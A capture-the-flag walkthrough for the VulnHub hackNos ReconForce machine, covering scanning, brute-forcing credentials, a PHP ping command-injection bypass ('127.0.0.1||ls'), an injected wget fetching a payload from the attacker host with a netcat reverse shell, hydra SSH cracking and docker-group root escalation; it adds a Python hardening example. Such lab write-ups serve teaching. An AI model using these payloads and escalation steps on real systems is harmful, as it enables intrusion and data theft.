Target machine address
https://www.vulnhub.com/entry/hacknos-reconforce,416/
Target machine testing
Information gathering
nmap port scan
nmap scan results
└─$ nmap -sC -sV 192.168.1.100 -oA hack
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-13 09:35 CST
Nmap scan report for 192.168.1.100
Host is up (0.00054s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.53
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
| 256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
|_ 256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.12 seconds
zsh: segmentation fault nmap -sC -sV 192.168.1.100 -oA hack
Ports 21, 22 and 80 are open, and the FTP service allows anonymous login.
Directory scan
└─$ gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.100
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2023/01/13 09:44:24 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 312] [--> http://192.168.1.100/css/]
/server-status (Status: 403) [Size: 278]
Progress: 296340 / 441122 (67.18%) ^C
[!] Keyboard interrupt detected, terminating.
Visit the home page
Clicking here pops up a login box.
FTP anonymous login
FTP allows anonymous login, but the directory holds nothing; the login banner, however, gives the hint Secure@hackNos.
Python password combinations
# Candidate prefixes, each combined with the @hackNos suffix seen in the FTP banner
word = ['Recon', 'Security', '5ecure', 'Secure']
for i in word:
    print(i + '@hackNos')
Cracking basic authentication
msfconsole
use auxiliary/scanner/http/http_login
Credentials found: admin:Security@hackNos
Command execution vulnerability
Analyzing the source
127.0.0.1||ls
127.0.0.1||cat out.php
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the characters in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>
Many characters are filtered, but the combination above happens to bypass the filter. Note that the ping command is still built by string concatenation and handed to shell_exec, so whatever survives the blacklist is parsed by the shell.
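To make the defensive point concrete, here is an added Python example (my own code, not from the box or the original write-up) that emulates the out.php blacklist as sequential replacements and sets it beside an allow-list check: because PHP's str_replace applies each pair to the output of the previous one, the '| ' pass can delete one bar of '||' before the '||' pass runs, so a pipe can still reach shell_exec, whereas the hardened version accepts only a literal IP address and passes an argv list with no shell. The function names are my own.

```python
import ipaddress
import subprocess

# Blacklist tokens copied from out.php, in the same order. PHP str_replace with
# arrays applies them one after another, each pass working on the previous result.
BLACKLIST = ['&', ';', '| ', '-', '$', '(', ')', '`', '||']


def sequential_blacklist(target: str) -> str:
    """Emulate the out.php filter: strip each token in list order."""
    for token in BLACKLIST:
        target = target.replace(token, '')
    return target


def is_safe_target(target: str) -> bool:
    """Allow-list check: accept only a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True


def build_ping_argv(target: str) -> list:
    """Hardened replacement for shell_exec('ping -c 4 ' . $target):
    validate first, then build an argv list so no shell ever parses the input."""
    if not is_safe_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return ['ping', '-c', '4', target.strip()]


def run_ping(target: str) -> str:
    """Run the validated ping without a shell (shell=False is the default)."""
    argv = build_ping_argv(target)
    return subprocess.run(argv, capture_output=True, text=True, timeout=15).stdout


if __name__ == '__main__':
    # Constructed sample inputs: a clean address and two containing pipes.
    # The '| ' pass removes one bar of '|| ' before the '||' pass looks for it,
    # so a single '|' survives the blacklist; the allow-list rejects both.
    for t in ['127.0.0.1', '127.0.0.1||ls', '127.0.0.1 || ls']:
        print(f"{t!r:20} blacklist leaves {sequential_blacklist(t)!r:18} "
              f"allow-list ok: {is_safe_target(t)}")
```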
Reverse shell
Download the file
||wget http://192.168.1.53/1.php
nc -lvnp 90
python -c 'import pty;pty.spawn("/bin/bash")'
Got an interactive shell
Testing the recon user's password
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
recon:x:1000:119:rahul:/home/recon:/bin/bash
Got user.txt
Testing passwords with hydra
└─$ hydra -l recon -P pass ssh://192.168.1.100
SSH login as the recon user
└─$ ssh recon@192.168.1.100
sudo -l
The recon user has full sudo rights.
Read root.txt
Privilege escalation
Method 1
ls -la
The listing shows a sudo_as_admin_successful file.
sudo -l, entering the password Security@hackNos
This shows that any command can be run.
Method 2
id
groups
The user is in the docker group, so docker can be used to escalate privileges.
docker images
Create a container shell
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
The alpine image is downloaded automatically.
Mount the host root directory at /mbt inside the container
docker run -it -v /:/mbt e7d92cdc71fe
cd /mbt
cat root/root.txt
Summary of lessons
nmap scan
gobuster directory scan
Basic authentication cracking
Password combinations
Command execution vulnerability
Creating an interactive shell
hydra SSH cracking
Source code analysis
docker privilege escalation
Wisdom needs time to settle; only through accumulation does it become full.